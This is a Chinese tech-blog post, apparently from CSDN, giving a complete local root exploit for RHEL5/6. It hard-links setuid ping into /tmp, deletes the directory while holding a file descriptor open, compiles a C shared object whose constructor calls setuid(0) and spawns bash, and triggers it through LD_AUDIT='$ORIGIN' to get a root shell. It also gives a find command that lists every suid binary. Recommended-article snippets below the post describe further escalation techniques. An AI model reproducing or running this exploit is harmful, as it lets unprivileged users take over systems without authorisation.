利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限

最新推荐文章于 2024-08-11 17:18:24 发布
最新推荐文章于 2024-08-11 17:18:24 发布
阅读量7.3k 收藏 8
点赞数 4
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fffygapl/article/details/51783346
版权

提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限


RHEL5-RHEL6下面都可以实现,root的UID是零


创建一个普通用户
useradd andy


切换到andy用户
su - andy


查看当前用户是谁
whoami


查看tmp目录权限
[andy@bogon tmp]$ ll -d /tmp
drwxrwxrwt. 15 root root 4096 6月  29 14:08 /tmp


切换到tmp目录
cd /tmp


创建一个exploit目录
mkdir exploit


查看ping命令带suid权限
ll /bin/ping


创建target文件硬链接
ln /bin/ping /tmp/exploit/target


查看target文件权限
ll /tmp/exploit/target


把target文件加载到内存中
exec 3< /tmp/exploit/target


查看target在内存中的情况
"ll /proc/$$/fd/3"


删除target文件
rm -rf /tmp/exploit/


查看target在内存中的情况是删除状态

"ll /proc/$$/fd/3"



创建一个c语言代码
[andy@bogon tmp]$ vim payload.c 


void __attribute__((constructor)) init()  // 两个下划线
{
     setuid(0);
     system("/bin/bash");
}




利用gcc编译这段代码
[andy@bogon tmp]$ gcc -W -fPIC -shared -o /tmp/exploit payload.c


提升到root权限
[andy@bogon tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination


执行完,查看当前会话已经是root
[root@localhost ~]# 


附:通过以下的命令可以找到系统上所有的设置了suid的文件:


[root@localhost /]# find / -perm -04000 -type f -ls
Fengg
关注
专栏目录
linux基础教程之特殊权限SUID、SGID和SBIT
01-20
对于linux中文件或目录权限,应该都知道普通的rwx权限。Linux的权限不是很细致,只有RWX三种 r(Read,读取):对文件而言,具有读取文件内容的权限;对目录来说,具有浏览目录权限。 w(Write,写入):对文件而...
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 5732
Linux提权姿势汇总
Mac系统ping不用提权的原因
aa642531的博客
12-31 1334
前几天在做udp嗅探的时候,发现一个问题,苹果系统的ping(ping6)是不用提权的,没有s位,引起了我的好奇,因为在我使用过的ubuntu系统或者是centos系统也好,这个ping都是带s位的。在解决主要问题的时候也顺便把这个问题给解决了。 会创建s权限,是为了让一般用户在执行某些程序的时候,能够暂时具有该程序拥有者的权限,ubuntu系统或者centos系统下ping程序为了接收ICMP...
Linux常见提权方式
最新发布
L_erAry的博客
08-11 1475
taskset命令用于设置进程(或 线程)的处理器亲和性(Processor Affinity),可以将进程(或 线程)绑定到特定的一个 或 多个CPU上去执行,而不允许将进程(或 线程)调度到其他的CPU上。在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。使用方法是,创建一个临时的文件,并在其中构建一个包来调用/bin/bash,然后通过apt-get安装该包。通过压缩一个存在的文件,并调用-T参数输出shell。
linux 利用tmp提权
12-30 4906
以一个普通用户登录 [hello@localhost tmp]$ ls -ld /tmp/   因为tmp目录能写文件!! drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/ [hello@localhost tmp]$ cd /tmp/ [hello@localhost tmp]$ mkdir exploit [hello@localhost
Linux怎么对当前目录提权,linux提权方法(不断总结更新)
weixin_28331555的博客
04-29 771
1.suid提权运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)搜索符合条件的可以用来提权的:find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;find / -user root -perm -4000 -print 2>/dev...
suid
Unicorn
05-04 2987
SUID    
Linux基础课件特殊权限设置SUID权限共10页.pdf
11-21
例如,如果一个不安全的SUID程序被攻击者利用,可能会导致权限提升,使攻击者能够控制系统。因此,合理设置和监控SUID权限至关重要。 此外,课件可能涵盖如何设置和检查SUID权限。在命令行中,可以使用`chmod`命令...
suid提权
m0_62207170的博客
02-28 338
suid提权
【Linux】Linux中的特权 | SUID | Linux Capabilities
Juruo@Security
02-04 1672
【Linux】Linux中的特权 | SUID | Linux Capabilities linux capabilities
命令执行nc的用法提权
04-20
这个文档是关于内核2.6.18-194.el5的提权利用的是nc命令
提权【几种提权方式】
weixin_34233679的博客
10-31 942
(( 本地溢出提权 ))计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.想要执行cmd命令,就要wscript.she...
Linux之SUID提权
Zlirving_的博客
08-25 827
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root   0x01 suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的:(三种都可以) find / -perm -u=s -type f 2>/
Centos普通用户提权至ROOT
weixin_30919919的博客
12-25 1524
1、利用/bin/ping的漏洞普通用户提权。(rws中的s) [root@localhost ~]# ls -l /bin/ping -rwsr-xr-x. 1 root root 40760 9月 26 2013 /bin/ping 2、执行以下代码即可: #!/bin/sh unset LD_AUDIT rm -r -f /tmp/exploit mkdir /t...
Linux Suid提权
YouthBelief的博客
12-21 721
Suid提权 原理 SUID(设置用户ID)是一种权限类型,它被赋予一个文件,允许用户以其所有者的权限执行该文件。Linux二进制文件可以拥有这种类型的权限集有很多原因。例如,ping实用程序需要root权限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 权限,则它们可用于将权限提升为 root。 suid权限 表示 chmod u+s 如下 二进制文件以 root 权限执行,因为它们的权限中包含“ s ”,并且它们归 roo
记一次Linux安全提权总结
kali_Ma的博客
09-15 614
前言:人们赞美流星,是因为它燃烧着走完自己的全部路程。 一、初识SUID 1.suid的简介 suid即set user id,是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。 已知的可以用来提权的Linux可执行文件有: CopyNmap、Vim、find、Bash、More、Less、Nano、cp 比如常用的ping命令。ping需要发送ICMP报文,而这个操作需要发送Raw Socket。在Linux 2.2引入CAPABILITI
SUID提权
热门推荐
一只web狗
07-01 1万+
SUID提权介绍
Linux记录用户执行命令
lumia98的博客
12-30 663
#!/bin/bash # By lumia98@vip.qq.com # 记录用户执行命令及IP地址 # 文件存放在 /etc/profile.d 或者/etc/profile # source /etc/profile 生效; # 登录提示权限不足可以忽略,因为这是禁止用户删除权限提示; # Linux系统记录每个用户执行的命令 # 创建目录 hislog_dir="/tmp/hislog" [ -d ${hislog_dir} ] || mkdir -p ${hislog_dir} # 第一次请先
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值